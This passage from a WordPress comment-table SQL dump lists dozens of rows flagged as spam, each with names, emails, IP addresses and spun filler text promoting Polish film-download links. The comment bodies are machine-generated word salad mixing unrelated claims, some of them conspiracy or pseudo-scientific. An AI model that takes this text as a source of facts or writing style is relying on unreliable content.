rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)','',0,0),(90,25,'Leonor','leonordownard@care2.com','','79.191.218.232','2014-06-26 11:59:07','2014-06-26 11:59:07','Once you find the best creatine supplement you should expect to \r\ngain energy after about a week of taking the supplement.\r\nThese also provide a much-needed boost to the immune system, which is an added benefit \r\nto this first-class supplement. However, this is a very large and reputable company and they stand behind their test results.\r\n\r\n\r\nTake a look at my web-site ... kreatine',0,'spam','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36','',0,0),(91,25,'Bernadine','bernadinemintz@arcor.de','','83.9.7.10','2014-06-27 17:06:21','2014-06-27 17:06:21','So the only thing that is sure is the fact that different online business ideas will generate different amount of income based on the knowledge and experience of the webpreneur.\r\nEven the delivery time too can be fixed in well advance as per the user\'s feasibility.\r\n\r\nTo setup a personal online shop there can be a monthly expense \r\nthat you have to bear.\r\n\r\nHere is my webpage :: Rodzinne rewolucje download (http://rapgenius.com)',0,'spam','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0','',0,0),(92,25,'Sherman','sherman.kirwin@yahoo.de','','178.42.106.14','2014-06-28 05:30:41','2014-06-28 05:30:41','Indeed, there are instances where Lady Luck may not \r\nfavor you. \" You can find a screen depicting the latest DLC release of the open-world action-adventure game from the official Rockstar Games Twitter account with the photo near the top of this article. This is a great time saver, which you have probably found out if you have ever tried to create a product of your own on the internet.\r\n\r\nStop by my blog - Zacznijmy od nowa online (http://mylikes.com/zaono84)',0,'spam','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0','',0,0),(93,25,'Juan','juanknowles@gmail.com','','83.24.134.16','2014-06-29 12:46:39','2014-06-29 12:46:39','They same can be said if they open up a new email account \r\nthat you can’t get into. To make money with google adsense, all \r\nyou want is a website or blog. I would stay up in front of my television and just watch Weeds,\r\nSeinfeld and Family Guy all night and day.\r\n\r\nMy weblog :: Zacznijmy od nowa online (www.golf3.pl)',0,'spam','Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/28.0.1500.52 Chrome/28.0.1500.52 Safari/537.36','',0,0),(94,25,'Marylou','maryloumoralez@gmail.com','','83.6.188.75','2014-06-30 09:16:02','2014-06-30 09:16:02','So the only thing that is sure is the fact that different online business ideas will generate different amount of income based on the knowledge and experience of \r\nthe webpreneur. Before registering your \r\nkid in online schools one has to explore much about schools which will deliver the very \r\nbest quality in ascribed education. And \r\nno matter how late, you can purchase all the time.\r\n\r\n\r\n\r\nMy site ... Rodzinne rewolucje online [Marylou]',0,'spam','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22','',0,0),(95,25,'Maggie','maggie.shumate@t-online.de','','196.196.16.50','2014-06-30 16:20:42','2014-06-30 16:20:42','I’m not that much of a internet reader to be honest but your blogs really nice, keep it up!\r\n\r\nI\'ll go ahead and bookmark your website to come back later.\r\nAll the best\r\n\r\nMy web site - pozycjonowanie stron www poznań (Maggie)',0,'spam','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22','',0,0),(96,25,'Natalia','nataliafrome@zoho.com','','83.6.197.165','2014-07-01 09:34:17','2014-07-01 09:34:17','Simply make a list of these stores and have \r\nsome time study to find out the top in terms \r\nof quality and affordability. Access to these classes is free of charge and \r\nthey are considered a bit of a hors d\'. After a little white lie about losing her virginity gets out, \r\na clean cut high school girl (Emma Stone) sees her life paralleling Hester Prynne\'s in \'The Scarlet Letter\'.\r\n\r\n\r\nFeel free to surf to my blog: Rodzinne rewolucje; http://www.stereogum.com,',0,'spam','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31','',0,0),(97,25,'Florene','florenegolding@whale-mail.com','','83.6.196.225','2014-07-01 22:00:29','2014-07-01 22:00:29','You could easily catch a cheating spouse online this way if they are using either of those methods to carry on a relationship with someone else.\r\nTo make money with google adsense, all you want \r\nis a website or blog. I have never had to download anything or experienced \r\nany computer problems.\r\n\r\nHere is my page Zacznijmy od nowa, folkd.com,',0,'spam','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36','',0,0),(98,25,'Letha','lethanarelle@inbox.com','','83.6.177.241','2014-07-03 04:14:00','2014-07-03 04:14:00','They same can be said if they open up a new email account \r\nthat you can’t get into. Apparels, jewelry, home and garden, decor, beauty, health and hyzone products, and even personalized gifts for special movement \r\nin life. That being said, here is how to start a small business online to make some extra money and to get your \r\nfeet wet in the online marketplace.\r\n\r\nFeel free to surf to my web-site; Zacznijmy od \r\nnowa download (www.worldcarfans.com)',0,'spam','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36','',0,0),(99,25,'Willie','williehalliday@web.de','','83.6.194.54','2014-07-03 08:00:18','2014-07-03 08:00:18','If you prefer to search free Iowa court records online by using a \r\ncase number, you may do so by following the same directions listed above.\r\nEven the delivery time too can be fixed in well advance as per the user\'s feasibility.\r\nI would have missed all my favorite shows \r\nif it wasn\'t for the internet TV and Direc - \r\nTV and yes I am a TV addict when it comes to watching my comedy shows.\r\n\r\n\r\nAlso visit my web site - Rodzinne rewolucje chomikuj, http://forum.pclab.pl/user/487801-rodzrew81,',0,'spam','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36','',0,0),(100,25,'Priscilla','priscillastonehouse@gmx.de','','83.6.194.54','2014-07-03 09:07:36','2014-07-03 09:07:36','Step 2: After searching a list of results will appear, Just \r\nclick the result you are looking for. You will receive a message on your mail and mobile \r\nwhen the transaction being complete. Avoid playing real time \r\ngames unless you don\'t mind stress, rude comments, and total frustration.\r\n\r\nFeel free to surf to my web page Zacznijmy od nowa online - legionisci.com -',0,'spam','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36','',0,0),(101,25,'Patricia','patricia.latham@gmail.com','','83.6.183.124','2014-07-04 14:43:11','2014-07-04 14:43:11','Simply make a list of these stores and have some time study to find out \r\nthe top in terms of quality and affordability.\r\nYou can utilize any of these repairmen and remove the printheads before asking for them for cleaning.\r\n\r\nIf another student typed a message stating, \'This class \r\nis so boring, homework is too hard and I cannot concentrate,\' it could be taken in a negative light.\r\n\r\n\r\nmy blog post - Rodzinne rewolucje (muckrack.com)',0,'spam','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36','',0,0),(102,25,'Marissa','marissacastleton@gmail.com','','83.6.183.124','2014-07-04 18:22:29','2014-07-04 18:22:29','Bottom line, don\'t take out student loans \'blindly\'.\r\nThis national TV broadcast gets underway \r\nat 11:30 a. This is a great time saver, which you have \r\nprobably found out if you have ever tried to create a product \r\nof your own on the internet.\r\n\r\nReview my blog :: Zacznijmy Od Nowa Online, Http://Www.Mniammniam.Com/,',0,'spam','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36','',0,0),(104,25,'On Sport info','Kotaki26747@gmail.com','http://onsportinfo.com','64.191.2.70','2014-07-05 14:55:16','2014-07-05 14:55:16','What did on your own employ in direction of layout your web site? It\'s seriously amazing can your self send out me an electronic mail and permit me notice?',0,'spam','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','',0,0),(106,25,'Percy','percyfishbourne@zoho.com','','23.95.92.143','2014-07-06 15:44:13','2014-07-06 15:44:13','Good post however I was wondering if you could write a litte more on this subject?\r\nI\'d be very thankful if you could elaborate a little bit further.\r\n\r\nKudos!\r\n\r\nHave a look at my web blog ... projektowanie stron internetowych',0,'spam','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/28.0.1500.52 Chrome/28.0.1500.52 Safari/537.36','',0,0),(107,25,'Erma','ermastorm@zoho.com','','83.6.179.92','2014-07-08 21:26:00','2014-07-08 21:26:00','To be content with what we possess is the greatest and most secure of riches (Cicero).\r\n\r\nHow additional tax of Rs 52000 or Rs 84000 can be justified for an additional income of Re 1 only.\r\n\r\nBecause the \'goal list\' is focused on a stream not present in the here and now.\r\n\r\n\r\nMy webpage - Transcendencja (www.bagtheweb.com)',0,'spam','Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0','',0,0),(108,25,'Dick','dick.nickerson@gmail.com','','79.191.216.46','2014-07-09 07:20:37','2014-07-09 07:20:37','For example, when we are late for an appointment we might tell ourselves that it\'s not going to matter, \r\nthat the excuse we give will be accepted and that there won\'t be any negative consequences.\r\nAnd diaries address what has happened before you arrived at this point at the river.\r\nFor example, according to materialist theory, buying numerous lottery \r\ntickets increases your chances of winning the \r\nlottery.\r\n\r\nmy page :: Gwiazd naszych wina chomikuj',0,'spam','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0','',0,0),(109,25,'Keira','keira_oaks@imapmail.org','','79.191.216.46','2014-07-09 08:22:55','2014-07-09 08:22:55','Henry Wallace suggested that a new dollar coin should be created to show the \r\nGreat Seal of the Egyptian Pyramid and the eye of God. This year, \r\n1,156,852 readers voted for their favorite books, and here are the results.\r\nThe only reason millions of people in history have been striving to be elsewhere or something else is \r\nout of the presupposition that the way things are, the way this planet was created is somehow \'wrong\' and that \r\nthe natural order and harmony of things is somehow \'disturbed\'.\r\n\r\n\r\nMy webpage; X Men Przeszłość która nadejdzie download',0,'spam','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0','',0,0),(110,25,'Janna','jannaluttrell@gawab.com','','83.6.22.231','2014-07-10 04:45:13','2014-07-10 04:45:13','By 1782, a third committee had to be formed and a unanimous decision was \r\nmade to use the symbol from the Illuminati. 7 Yet \r\nmaterialistic scientists still reject astrology. For example, according to materialist theory, buying numerous lottery tickets increases your chances of winning the lottery.\r\n\r\n\r\n\r\nHere is my web page: Gwiazd naszych wina',0,'spam','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0','',0,0),(111,25,'Abraham','abraham.mcbeath@gawab.com','','83.6.22.231','2014-07-10 07:04:16','2014-07-10 07:04:16','Shelflife has called the Goodreads Choice Awards the People’s Choice Awards of books.\r\nNot all of Airy\'s work was done at Greenwich though.\r\nIt is grown in the Kona district of Hawaii, where \r\nthere is fertile volcanic soil.\r\n\r\nLook at my page; Transcendencja online (http://www.studyabroad.com/members/xmpkn85/default.aspx)',0,'spam','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0','',0,0),(112,25,'Annabelle','annabellebroughton@gmail.com','','178.42.107.14','2014-07-11 20:27:01','2014-07-11 20:27:01','That magical science cannot be analyzed with statistics doesn\'t address the issue of whether magic is true.\r\nJB: I actually was away when the movie premiered at \r\nNew York\'s Ziegfeld Theater. s spouse can be a strong reason to file a divorce case depending on the situation one.\r\n\r\n\r\nVisit my site X Men Przeszłość która nadejdzie download \r\n(ask.fm)',0,'spam','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:20.0) Gecko/20100101 Firefox/20.0','',0,0),(113,25,'Beatriz','beatrizweisz@gawab.com','','178.42.107.14','2014-07-12 04:33:30','2014-07-12 04:33:30','1,000,001 21% 210,000 35,000. How additional tax of Rs 52000 or \r\nRs 84000 can be justified for an additional income of Re 1 only.\r\n\r\n\'The Fault in Our Stars,\' is the heartfelt poignant story about two teenagers who fall \r\nin love while battling cancer, which was adapted from John Green\'s best-selling book \r\nof the same title.\r\n\r\nLook at my web site: Transcendencja chomikuj, Funnyordie.Com,',0,'spam','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0','',0,0),(114,25,'Kyle','kylenemeth@hotmail.com','','83.6.194.78','2014-07-12 21:54:07','2014-07-12 21:54:07','To be content with what we possess is the greatest and most secure of riches (Cicero).\r\nOnce the NCAP ratings are tested again, there\'s no doubt that an extra star will \r\nbe awarded, making the Audi Q7 a great choice. It is grown in the Kona district \r\nof Hawaii, where there is fertile volcanic soil.\r\n\r\n\r\nFeel free to surf to my page - Transcendencja download \r\n(Kyle)',0,'spam','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0','',0,0),(115,25,'Sherita','sheritawherry@internet-mail.org','','83.6.194.78','2014-07-12 23:57:38','2014-07-12 23:57:38','1,000,001 21% 210,000 35,000. The poor quality of human life is \r\ndue to the feebleness of the beam of attention that we direct at the world (Colin Wilson).\r\nThe only reason millions of people in history have been striving to be elsewhere or something else is out of the \r\npresupposition that the way things are, the way this planet was \r\ncreated is somehow \'wrong\' and that the natural order and \r\nharmony of things is somehow \'disturbed\'.\r\n\r\nLook into my web page - X Men Przeszłość która nadejdzie \r\n(Sherita)',0,'spam','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0','',0,0),(116,25,'Jodi','jodi.andrzejewski@gmail.com','','5.175.196.199','2014-07-13 15:34:25','2014-07-13 15:34:25','It\'ѕ vеrԀy simple to find out any topic on web ass compared to books, \r\nas I fund this post at this ѕite.\r\n\r\nMy webpage; societies m',0,'spam','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0','',0,0),(117,25,'Edward','edwardspowers@gmx.net','','91.236.74.101','2014-07-14 01:50:33','2014-07-14 01:50:33','Howdy I am so thrilled I found your weblog, I \r\nreally found you by error, while I was looking on Bing for something else,\r\nAnyhow I am here now and would just like to say thanks a lot for a \r\nremarkable post and a all round enjoyable blog (I also love the theme/design), I don’t have time \r\nto read through it all at the moment but I have book-marked it and also included your RSS feeds, so when I have time I will be back to read a lot more, Please do keep up the great work.\r\n\r\n\r\nmy homepage ... darmowy serwis randkowy',0,'spam','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.15','',0,0),(118,25,'Francisco','francisco.maccormick@yahoo.de','','178.42.119.141','2014-07-14 06:33:42','2014-07-14 06:33:42','That magical science cannot be analyzed with statistics doesn\'t address the issue \r\nof whether magic is true. The poor quality of human life is due to the feebleness of the beam of attention that we direct at the world \r\n(Colin Wilson). This is not a Jennifer Lawrence science fiction \"Hunger Games\" franchise film; but rather, a tragic love story that follows the \r\nsame formula as \"Love Story\" did a generation ago.\r\n\r\nVisit my website Transcendencja (mportalik.net.pl)',0,'spam','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.15','',0,0),(119,25,'Lacy','lacyballou@t-online.de','','83.6.168.208','2014-07-15 11:20:46','2014-07-15 11:20:46','But this season, a far more serious subject undergirds a movie featuring teenage characters.\r\n7 Yet materialistic scientists still reject astrology.\r\nThe only reason someone would paddle upstream is because \r\nhe does not trust that the river is taking him to the right places \r\nspeedily and efficiently.\r\n\r\nmy weblog :: Gwiazd naszych wina download',0,'spam','Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]','',0,0),(120,25,'Merri','merri_flannagan@web.de','','83.6.168.208','2014-07-15 17:28:11','2014-07-15 17:28:11','Henry Wallace suggested that a new dollar coin should be created to show the \r\nGreat Seal of the Egyptian Pyramid and the eye of God.\r\n\r\nThe poor quality of human life is due to the feebleness of \r\nthe beam of attention that we direct at the world (Colin Wilson).\r\nThe only reason millions of people in history have \r\nbeen striving to be elsewhere or something else is out of the presupposition that the way \r\nthings are, the way this planet was created is somehow \'wrong\' and that the natural order and harmony of things is somehow \'disturbed\'.\r\n\r\n\r\nHere is my web page - Transcendencja online - parkliteracki.pl,',0,'spam','Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]','',0,0),(121,25,'Williemae','williemaependergrass@freenet.de','','83.6.168.208','2014-07-16 04:56:50','2014-07-16 04:56:50','Henry Wallace suggested that a new dollar coin should be created \r\nto show the Great Seal of the Egyptian Pyramid and the \r\neye of God. To make the gift more unique, it can be made at home and include some other \r\nitems from packs of coffee. They felt lighter and easier to hit than normal, and that was after practicing with the Medicus \r\nDriver for only a few minutes.\r\n\r\nMy web-site :: X Men Przeszłość która nadejdzie chomikuj (Williemae)',0,'spam','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)','',0,0),(122,25,'Gabriele','gabriele.haugh@arcor.de','','83.6.183.118','2014-07-16 23:37:03','2014-07-16 23:37:03','8,400,001 20% 1,680,000 84,000.\r\nAnd diaries address what has happened before you arrived at this point at the river.\r\nThe only reason someone would paddle upstream \r\nis because he does not trust that the river is taking him to the right \r\nplaces speedily and efficiently.\r\n\r\nFeel free to visit my web page Gwiazd naszych wina',0,'spam','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)','',0,0),(123,25,'Kandice','kandicehungerford@yahoo.com','','83.6.183.118','2014-07-17 01:17:32','2014-07-17 01:17:32','Along with all the other community which includes religion along with prisons and hospitals.\r\nHow additional tax of Rs 52000 or Rs 84000 can be justified for an additional income of Re 1 only.\r\n\'The Fault in Our Stars,\' is the heartfelt poignant story about two teenagers who fall in love while battling cancer, which \r\nwas adapted from John Green\'s best-selling book of the same \r\ntitle.\r\n\r\nmy weblog ... Transcendencja',0,'spam','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)','',0,0),(124,25,'Ivey Ahrenholz','Gulbrandson72373@gmail.com','http://articlefinanse.com/','50.118.141.113','2014-07-17 05:49:39','2014-07-17 05:49:39','Howdy Moni, Adrien is practically as outrageous as us. Portray a property at Xmas v relocating property at Xmas, it is controversial which a single is utmost disruptive. I believe that yourself adult men could possibly contain the benefit. I am dishonest despite the fact that and moving in the direction of my daughter\'s for Xmas eve evening and Xmas working day. That hasn\'t excused me against cooking despite the fact that. I am trusted for the pudding, the custard, the vegetarian \"meat\"loaf and the pavlova.',0,'spam','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)','',0,0),(126,25,'Shannon','shannonchristensen@zoho.com','','79.191.219.1','2014-07-17 11:50:22','2014-07-17 11:50:22','According to Divorce-Online, legal experts all agree that those statistics will continue to grow as more and more consumers log on to these sites to \r\nshare updates about their lives, logging in each day to stay connected to \r\nfamily, friends, clients and colleagues. It proved a \r\ndirect historical line in the love story genre of one \r\nhalf a couple having a fatal disease. s spouse can be a \r\nstrong reason to file a divorce case depending on the situation one.\r\n\r\n\r\nMy web site - X Men Przeszłość która nadejdzie download',0,'spam','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)','',0,0),(127,25,'Christi','christicope@internet-mail.org','','178.42.101.153','2014-07-18 13:33:38','2014-07-18 13:33:38','Every time is the perfect time to gather fresh Apples a fresh Bananas and make the recipe for apple \r\nand banana salad recipe. It proved a direct historical line in the love story genre of one half a couple having a fatal disease.\r\nBecause the \'goal list\' is focused on a stream not present in the \r\nhere and now.\r\n\r\nAlso visit my web-site; Transcendencja chomikuj',0,'spam','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','',0,0),(128,25,'Zandra','zandrahairston@freenet.de','','178.42.101.153','2014-07-18 21:28:39','2014-07-18 21:28:39','To be content with what we possess is the greatest and most \r\nsecure of riches (Cicero). The poor quality of human life is due to the feebleness of the beam of attention that we direct at the world (Colin Wilson).\r\nBecause the \'goal list\' is focused on a stream not \r\npresent in the here and now.\r\n\r\nmy web page - X Men Przeszłość która nadejdzie download (thisnext.com)',0,'spam','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','',0,0),(129,25,'Tammy','tammy_lundstrom@gmx.net','','178.42.101.153','2014-07-19 00:00:18','2014-07-19 00:00:18','Another Illuminati member named Christoph Friedrich Nicolai (1733-1811), nicknamed \"Lucianus,\" picked \r\nup where Knigge left off. Readers will find themselves expecting plot twists because of the unpredictable nature of cancer but when situations actually arise, they \r\nalways come as a surprise. Shelflife has called the Goodreads Choice Awards the People’s Choice Awards of books.\r\n\r\n\r\nMy web blog :: Gwiazd naszych wina chomikuj',0,'spam','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)','',0,0),(130,25,'Tracey','traceyeisenhauer@gmx.de','','83.9.2.191','2014-07-19 09:42:11','2014-07-19 09:42:11','Another Illuminati member named Christoph Friedrich Nicolai (1733-1811), nicknamed \"Lucianus,\" picked up where Knigge left off.\r\nAnd diaries address what has happened before you \r\narrived at this point at the river. All social media establishes a record of communication.\r\n\r\nAlso visit my homepage; Gwiazd naszych wina',0,'spam','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)','',0,0),(131,25,'Maxine','maxineberryhill@gmail.com','','83.9.2.191','2014-07-19 12:57:37','2014-07-19 12:57:37','On this page, you will find lots and lots about him as a person (what he has accomplished and so on).\r\nReaders will find themselves expecting plot twists because of the unpredictable nature of cancer \r\nbut when situations actually arise, they always \r\ncome as a surprise. Similarly, when you look at this little piece of the universe over there \' that which can be \r\napprehended with the mind \' then materialistic science works pretty \r\nwell.\r\n\r\nVisit my web site; Gwiazd naszych wina chomikuj',0,'spam','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)','',0,0),(132,25,'Damion','damion.tishler@t-online.de','','83.9.141.50','2014-07-21 21:07:56','2014-07-21 21:07:56','By 1782, a third committee had to be formed and a \r\nunanimous decision was made to use the symbol from the Illuminati.\r\nOther genre winners included Stephen King, Terry Pratchett, E.\r\nThe only reason someone would paddle upstream is because he does not trust that the river is \r\ntaking him to the right places speedily and efficiently.\r\n\r\nFeel free to surf to my webpage: Gwiazd naszych wina',0,'spam','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','',0,0),(133,25,'Rafael','rafaellatham@gmail.com','','83.6.189.129','2014-07-23 06:26:09','2014-07-23 06:26:09','Another Illuminati member named Christoph Friedrich Nicolai (1733-1811), nicknamed \"Lucianus,\" picked up where Knigge left off.\r\nReaders will find themselves expecting plot twists because of the unpredictable nature of cancer but \r\nwhen situations actually arise, they always come as a surprise.\r\nShelflife has called the Goodreads Choice Awards the People’s Choice Awards of books.\r\n\r\n\r\nmy web page Gwiazd naszych wina chomikuj',0,'spam','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)','',0,0),(134,25,'Edith','edithhardy@live.de','','83.24.134.254','2014-07-24 22:59:59','2014-07-24 22:59:59','By 1782, a third committee had to be formed and a unanimous decision was made to use the symbol from the Illuminati.\r\nSome might argue she earned her first Oscar nomination for 2011\'s The Descendants \r\nfor crying underwater (UNDERWATER. Other confirmed \r\npresenters are Cameron Diaz, Kate Upton, Lupita Nyong\'o, Johnny \r\nDepp, and Andrew Garfield.\r\n\r\nAlso visit my weblog Gwiazd naszych wina chomikuj',0,'spam','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)','',0,0),(135,25,'Elyse','elyseschwartz@googlemail.com','','83.24.134.254','2014-07-25 04:53:31','2014-07-25 04:53:31','Henry Wallace suggested that a new dollar coin should be created to show the Great Seal \r\nof the Egyptian Pyramid and the eye of God.\r\n\r\nIt proved a direct historical line in the love story genre of one half a \r\ncouple having a fatal disease. As well as providing an instant community \r\nof like-minded individuals who are actively engaged sports \r\narbitrage at the same time, if the Chat is \r\nbuilt into the software then it should allow much faster sharing of \r\nsports arbitrage trades than would be possible using \r\na normal instant messenger service such as MSN or ICQ.\r\n\r\n\r\nAlso visit my web page ... X Men Przeszłość która nadejdzie \r\n(Elyse)',0,'spam','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)','',0,0),(136,25,'Elvira','elviramcmillen@inbox.com','','83.6.188.206','2014-07-25 20:00:10','2014-07-25 20:00:10','1,000,001 21% 210,000 35,000.\r\nThe poor quality of human life is due to the feebleness of the beam of attention that we direct at the world (Colin Wilson).\r\nBecause the \'goal list\' is focused on a stream \r\nnot present in the here and now.\r\n\r\nHere is my website: Transcendencja online',0,'spam','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)','',0,0),(137,25,'Remona','remona.laboureyas@hotmail.de','','83.6.180.118','2014-07-26 12:09:39','2014-07-26 12:09:39','The story of Hazel and Gus, while fiction, \r\nreverberates with remnants of reality in each tearful embrace and \r\nsarcastic remark about death. Other genre winners included Stephen King, Terry Pratchett, E.\r\nSimilarly, when you look at this little piece of the universe over there \' that which can be apprehended \r\nwith the mind \' then materialistic science works pretty well.\r\n\r\n\r\n\r\nMy web site: Gwiazd naszych wina',0,'spam','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)','',0,0),(138,25,'Dollie','dollieduckworth@gmail.com','','178.42.123.130','2014-07-27 04:58:38','2014-07-27 04:58:38','That magical science cannot be analyzed with statistics doesn\'t address the issue of whether magic is true.\r\nOnce the NCAP ratings are tested again, there\'s no doubt that an extra \r\nstar will be awarded, making the Audi Q7 a great choice.\r\n\r\nBecause the \'goal list\' is focused on a stream not present in the here and \r\nnow.\r\n\r\nFeel free to surf to my site Transcendencja download',0,'spam','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','',0,0),(139,25,'Sharron','sharronleverett@gmx.net','','178.42.123.130','2014-07-27 06:14:55','2014-07-27 06:14:55','Shelflife has called the Goodreads Choice Awards the People’s Choice Awards of books.\r\nIt proved a direct historical line in the love story genre of one half a couple having a fatal disease.\r\nThe only reason millions of people in history have been striving \r\nto be elsewhere or something else is out of the presupposition that the way things are, the way this planet was created is somehow \'wrong\' and that the natural order and harmony \r\nof things is somehow \'disturbed\'.\r\n\r\nHere is my blog post ... X Men Przeszłość która nadejdzie chomikuj (Sharron)',0,'spam','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','',0,0),(140,25,'Anibal','anibal_tuckson@t-online.de','','178.42.123.130','2014-07-27 19:52:48','2014-07-27 19:52:48','Probably, you (and I) could stand to cut some of the calories out of our daily diet.\r\nIt\'s a form of music based on fiddle tunes from the British Isles, but the instrumentation, and now most of the music itself; are uniquely American. All social media establishes a record of communication.\r\n\r\nFeel free to visit my blog - Gwiazd naszych wina download',0,'spam','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','',0,0),(141,25,'Charissa','charissalorimer@inbox.com','','79.191.215.11','2014-08-01 22:08:16','2014-08-01 22:08:16','Thus, a sequel was rushed into production and this sequel entitled \'The Purge: Anarchy\' is it.\r\nOf course, just like in real life society, the resistance in the film \r\nfeels its the almighty dollar that\'s the motivation behind the cleansing of society.\r\nReligious groups often persecute members of other religious groups.\r\n\r\n\r\nLook into my web blog - Noc oczyszczenia Anarchia online (docs.google.com)',0,'spam','Mozilla/5.0 (iPod; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25','',0,0),(142,25,'Zoila','zoila_arndell@aol.com','','83.6.186.3','2014-08-03 15:32:09','2014-08-03 15:32:09','This may be due to the fact that our own world is one in which the \r\nlines between the haves and have not\'s have never been more clear.\r\n\' After watching The Purge: Anarchy, which hits theaters everywhere on July 18, it should become clear to viewers that De - Monaco took great pains to \r\navoid that same issue in his follow-up to the first film.\r\nAt least three of the Islamic militants who took part in the kamikaze hijack attack on America had copies of \r\nthe same handwritten set of \"instructions\" - a spiritual and practical how-to of terror.\r\n\r\n\r\nHere is my web page :: Noc oczyszczenia Anarchia \r\nonline (docs.google.com)',0,'spam','Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','',0,0),(143,25,'Alvin','alvinsammons@gmx.net','','83.24.29.85','2014-08-04 22:36:55','2014-08-04 22:36:55','Live fast, die young Live fast, die young Live fast, die young.\r\nThe final result is your avatar portrait, which is visible to other players in several ways, including our message boards and in-game chat channels.\r\n\r\nHe stated that for the path to socialism, \"Defeating right-wing extremism is seen as simply the first stage of the fight,\" as \r\nreported in People\'s World (PW), the official newspaper of CPUSA, but the delegates (after \r\ndefeating the right wing), \"intend to go much, much further.\r\n\r\nHere is my weblog Noc oczyszczenia Anarchia online; 